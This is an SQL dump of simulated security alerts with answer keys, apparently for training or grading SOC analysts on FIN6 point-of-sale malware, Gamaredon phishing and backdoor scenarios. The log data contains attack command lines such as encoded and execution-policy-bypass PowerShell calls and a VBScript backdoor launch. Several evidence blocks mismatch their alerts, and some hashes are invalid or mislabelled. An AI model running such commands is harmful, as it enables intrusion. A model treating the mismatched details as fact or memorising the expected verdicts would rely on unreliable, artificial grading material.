(459, 'Trinity Malware Deployment on POS Systems', 'high', 'Endpoint Detection and Response (EDR)', 'FIN6 has deployed Trinity malware on several Point-of-Sale (POS) systems, targeting RAM to scrape unencrypted credit card data.', 'Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T14:22:45Z\",\"event_id\":\"4624\",\"computer_name\":\"POS-Server-22\",\"user\":\"svc-posadmin\",\"source_ip\":\"185.23.45.67\",\"internal_ip\":\"192.168.1.105\",\"process_name\":\"powershell.exe\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\pos_trinity.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"event_description\":\"Execution of suspicious binary linked to Trinity malware on POS system.\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Windows\\\\System32\\\\pos_trinity.exe\"}', '2026-01-05 00:10:13', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.23.45.67\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known FIN6 command and control servers.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local POS system IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Trinity malware sample.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"pos_trinity.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"Filename identified as Trinity malware targeting POS 
systems.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"svc-posadmin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"Service account used in anomalous execution.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(460, 'Establishing Persistent Access', 'high', 'Network Traffic Analysis', 'The attacker has set up a persistent backdoor on the POS network, ensuring they can regain access even if initial malware installations are removed. Network traffic analysis revealed unauthorized communication from an internal host to a known malicious IP, indicating the presence of a backdoor.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"src_ip\":\"192.168.1.45\",\"dest_ip\":\"203.0.113.25\",\"protocol\":\"TCP\",\"port\":\"4444\",\"action\":\"allowed\",\"user\":\"john_doe\",\"process_name\":\"backdoor_service.exe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"malware_family\":\"APT_Backdoor\",\"event_id\":\"1002\",\"message\":\"Outbound connection to known malicious IP detected from internal host.\"}', '2026-01-05 00:10:13', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT_Backdoor malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"backdoor_service.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"File used to establish persistent access by creating unauthorized external 
connections.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(461, 'Unauthorized Lateral Movement Detected', 'high', 'Anomaly Detection Systems', 'An unauthorized lateral movement has been detected involving compromised credentials and malware. The attacker, identified as FIN6, is attempting to move laterally through the network, targeting point-of-sale (POS) systems and databases. The activity involves the use of specific malware and compromised user accounts.', 'Lateral Movement', 'T1071.001 - Application Layer Protocol: Web Protocols', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:45:00Z\",\"src_ip\":\"195.22.26.189\",\"dest_ip\":\"192.168.1.15\",\"src_user\":\"j.doe\",\"compromised_credential\":true,\"malware_hash\":\"3b2e890d4f1a4e6d8a7c1f2b3e4d5c6f\",\"malware_filename\":\"pos_grabber.exe\",\"activity\":{\"description\":\"Lateral movement attempt using compromised credentials\",\"target_system\":\"POS server\",\"method\":\"SMB protocol over port 445\"}}', '2026-01-05 00:10:13', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"195.22.26.189\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with FIN6 operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Inventory\",\"verdict\":\"internal\",\"details\":\"Internal POS server\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"suspicious\",\"details\":\"User account flagged for unusual activity\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3b2e890d4f1a4e6d8a7c1f2b3e4d5c6f\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Database\",\"verdict\":\"malicious\",\"details\":\"Known hash of malware used by 
FIN6\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"pos_grabber.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Executable associated with POS system attacks\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.071Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:00Z\\\",\\\"src_ip\\\":\\\"195.22.26.189\\\",\\\"dest_ip\\\":\\\"192.168.1.15\\\",\\\"src_user\\\":\\\"j.doe\\\",\\\"compromised_credential\\\":true,\\\"malware_hash\\\":\\\"3b2e890d4f1a4e6d8a7c1f2b3e4d5c6f\\\",\\\"malware_filename\\\":\\\"pos_grabber.exe\\\",\\\"activity\\\":{\\\"description\\\":\\\"Lateral movement attempt using compromised credentials\\\",\\\"target_system\\\":\\\"POS server\\\",\\\"method\\\":\\\"SMB protocol over port 445\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:19.071Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:00Z\\\",\\\"src_ip\\\":\\\"195.22.26.189\\\",\\\"dest_ip\\\":\\\"192.168.1.15\\\",\\\"src_user\\\":\\\"j.doe\\\",\\\"compromised_credential\\\":true,\\\"malware_hash\\\":\\\"3b2e890d4f1a4e6d8a7c1f2b3e4d5c6f\\\",\\\"malware_filename\\\":\\\"pos_grabber.exe\\\",\\\"activity\\\":{\\\"description\\\":\\\"Lateral movement attempt using compromised 
credentials\\\",\\\"target_system\\\":\\\"POS server\\\",\\\"method\\\":\\\"SMB protocol over port 445\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:19.071Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:00Z\\\",\\\"src_ip\\\":\\\"195.22.26.189\\\",\\\"dest_ip\\\":\\\"192.168.1.15\\\",\\\"src_user\\\":\\\"j.doe\\\",\\\"compromised_credential\\\":true,\\\"malware_hash\\\":\\\"3b2e890d4f1a4e6d8a7c1f2b3e4d5c6f\\\",\\\"malware_filename\\\":\\\"pos_grabber.exe\\\",\\\"activity\\\":{\\\"description\\\":\\\"Lateral movement attempt using compromised credentials\\\",\\\"target_system\\\":\\\"POS server\\\",\\\"method\\\":\\\"SMB protocol over port 445\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:19.071Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:00Z\\\",\\\"src_ip\\\":\\\"195.22.26.189\\\",\\\"dest_ip\\\":\\\"192.168.1.15\\\",\\\"src_user\\\":\\\"j.doe\\\",\\\"compromised_credential\\\":true,\\\"malware_hash\\\":\\\"3b2e890d4f1a4e6d8a7c1f2b3e4d5c6f\\\",\\\"malware_filename\\\":\\\"pos_grabber.exe\\\",\\\"activity\\\":{\\\"description\\\":\\\"Lateral movement attempt using compromised credentials\\\",\\\"target_system\\\":\\\"POS server\\\",\\\"method\\\":\\\"SMB protocol over port 445\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:19.071Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:00Z\\\",\\\"src_ip\\\":\\\"195.22.26.189\\\",\\\"dest_ip\\\":\\\"192.168.1.15\\\",\\\"src_user\\\":\\\"j.doe\\\",\\\"compromised_credential\\\":true,\\\"malware_hash\\\":\\\"3b2e890d4f1a4e6d8a7c1f2b3e4d5c6f\\\",\\\"malware_filename\\\":\\\"pos_grabber.exe\\\",\\\"activity\\\":{\\\"description\\\":\\\"Lateral movement attempt using compromised credentials\\\",\\\"target_system\\\":\\\"POS server\\\",\\\"method\\\":\\\"SMB protocol over port 445\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(462, 'Exfiltration of Credit Card Data', 'high', 'Data Loss Prevention (DLP) Tools', 'FIN6 has initiated the exfiltration of previously scraped credit card data to an external server, marking the completion of their primary objective in this attack cycle.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:32:05Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"10.0.3.15\",\"destination_ip\":\"185.199.108.153\",\"destination_domain\":\"malicious-server.com\",\"protocol\":\"HTTPS\",\"file_name\":\"cc_data_dump.zip\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"user\":\"john.doe\",\"alert_trigger\":\"DLP: Credit Card Data Exfiltration Detected\",\"data_volume\":\"25MB\",\"process_name\":\"python.exe\",\"process_id\":4567}', '2026-01-05 00:10:13', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known exfiltration activities by FIN6.\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"malicious-server.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Domain Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Domain frequently used by FIN6 for data exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"cc_data_dump.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"Local DLP Database\",\"verdict\":\"suspicious\",\"details\":\"File matches pattern for exfiltration data dumps.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Registry\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known FIN6 malware 
operations.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.072Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:05Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.3.15\\\",\\\"destination_ip\\\":\\\"185.199.108.153\\\",\\\"destination_domain\\\":\\\"malicious-server.com\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"cc_data_dump.zip\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"john.doe\\\",\\\"alert_trigger\\\":\\\"DLP: Credit Card Data Exfiltration Detected\\\",\\\"data_volume\\\":\\\"25MB\\\",\\\"process_name\\\":\\\"python.exe\\\",\\\"process_id\\\":4567}\"},{\"timestamp\":\"2026-02-01T20:31:19.072Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:05Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.3.15\\\",\\\"destination_ip\\\":\\\"185.199.108.153\\\",\\\"destination_domain\\\":\\\"malicious-server.com\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"cc_data_dump.zip\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"john.doe\\\",\\\"alert_trigger\\\":\\\"DLP: Credit Card Data Exfiltration 
Detected\\\",\\\"data_volume\\\":\\\"25MB\\\",\\\"process_name\\\":\\\"python.exe\\\",\\\"process_id\\\":4567}\"},{\"timestamp\":\"2026-02-01T20:30:19.072Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:05Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.3.15\\\",\\\"destination_ip\\\":\\\"185.199.108.153\\\",\\\"destination_domain\\\":\\\"malicious-server.com\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"cc_data_dump.zip\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"john.doe\\\",\\\"alert_trigger\\\":\\\"DLP: Credit Card Data Exfiltration Detected\\\",\\\"data_volume\\\":\\\"25MB\\\",\\\"process_name\\\":\\\"python.exe\\\",\\\"process_id\\\":4567}\"},{\"timestamp\":\"2026-02-01T20:29:19.072Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:05Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.3.15\\\",\\\"destination_ip\\\":\\\"185.199.108.153\\\",\\\"destination_domain\\\":\\\"malicious-server.com\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"cc_data_dump.zip\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"john.doe\\\",\\\"alert_trigger\\\":\\\"DLP: Credit Card Data Exfiltration Detected\\\",\\\"data_volume\\\":\\\"25MB\\\",\\\"process_name\\\":\\\"python.exe\\\",\\\"process_id\\\":4567}\"},{\"timestamp\":\"2026-02-01T20:28:19.072Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:05Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.3.15\\\",\\\"destination_ip\\\":\\\"185.199.108.153\\\",\\\"destination_domain\\\":\\\"malicious-server.com\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"cc_data_dump.zip\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"john.doe\\\",\\\"alert_trigger\\\":\\\"DLP: Credit Card Data Exfiltration Detected\\\",\\\"data_volume\\\":\\\"25MB\\\",\\\"process_name\\\":\\\"python.exe\\\",\\\"process_id\\\":4567}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(463, 'Initial Access via Weaponized Word Document', 'high', 'Email Gateway Logs', 'A phishing email was detected containing a weaponized Word document. The email was designed to appear as an official military communication, enticing the recipient to open the attachment. Upon opening, the document initiates a template injection exploit aimed at gaining initial access to the target\'s network.', 'Phishing', 'T1203', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:30Z\",\"email_id\":\"d5f7a8e3-9abc-4567-80d5-5d3fa8765b41\",\"source_ip\":\"91.121.92.36\",\"destination_ip\":\"192.168.1.45\",\"sender_email\":\"info@military-ops.co\",\"recipient_email\":\"j.doe@target-organization.com\",\"subject\":\"Urgent: Military Operations Briefing\",\"attachment\":{\"filename\":\"Operations_Update.docx\",\"hash\":\"e9b1f8b9f8a7e4c9c9b9d8c8d7d6e5a4\"},\"malware_family\":\"Gamaredon\",\"exploit_technique\":\"Template Injection\"}', '2026-01-05 02:59:34', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"91.121.92.36\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Gamaredon operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the recipient\'s workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"info@military-ops.co\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Email domain used in previous phishing campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e9b1f8b9f8a7e4c9c9b9d8c8d7d6e5a4\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash identified as associated with Gamaredon 
malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Weaponized Word Document\",\"date\":\"2026-02-01T20:32:19.073Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(464, 'Execution of Embedded VBScript Backdoor', 'high', 'Endpoint Detection and Response (EDR)', 'Upon opening the Word document, a concealed VBScript backdoor is executed, connecting to a command and control server, enabling remote command execution and persistence within the network.', 'Code Execution', 'T1059.005', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:00Z\",\"event_type\":\"code_execution\",\"host_ip\":\"192.168.1.15\",\"user\":\"jdoe\",\"process_name\":\"winword.exe\",\"script_name\":\"malicious_script.vbs\",\"script_hash\":\"3a4f1b2c5e6d7f8g9h10i11j12k13l14m15n16o17p\",\"c2_ip\":\"203.0.113.45\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\malicious_script.vbs\",\"command\":\"cscript.exe C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\malicious_script.vbs\",\"action\":\"process_created\"}', '2026-01-05 02:59:34', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal network IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known command and control server IP\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3a4f1b2c5e6d7f8g9h10i11j12k13l14m15n16o17p\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with VBScript backdoor\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_script.vbs\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"malicious\",\"details\":\"Detected as a malicious VBScript backdoor\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(465, 'Data Exfiltration via Encrypted Channels', 'high', 'Network Traffic Analysis', 'The attackers have initiated data exfiltration by encrypting sensitive military data and transferring it through a secure TLS channel to an external server. The data was gathered using a deployed VBScript backdoor, enabling discreet exfiltration.', 'Data Theft', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:53:21Z\",\"src_ip\":\"192.168.1.45\",\"dest_ip\":\"203.0.113.77\",\"src_port\":\"44321\",\"dest_port\":\"443\",\"protocol\":\"TLS\",\"username\":\"jdoe\",\"filename\":\"military_data_enc.zip\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\",\"action\":\"transferred\",\"encryption\":\"AES-256\",\"malware_name\":\"VBScript_Backdoor\"}', '2026-01-05 02:59:34', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host potentially compromised.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"External Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP used for data exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with VBScript_Backdoor.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"military_data_enc.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Encrypted file potentially containing sensitive data.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"User Activity Logs\",\"verdict\":\"internal\",\"details\":\"User credentials 
potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
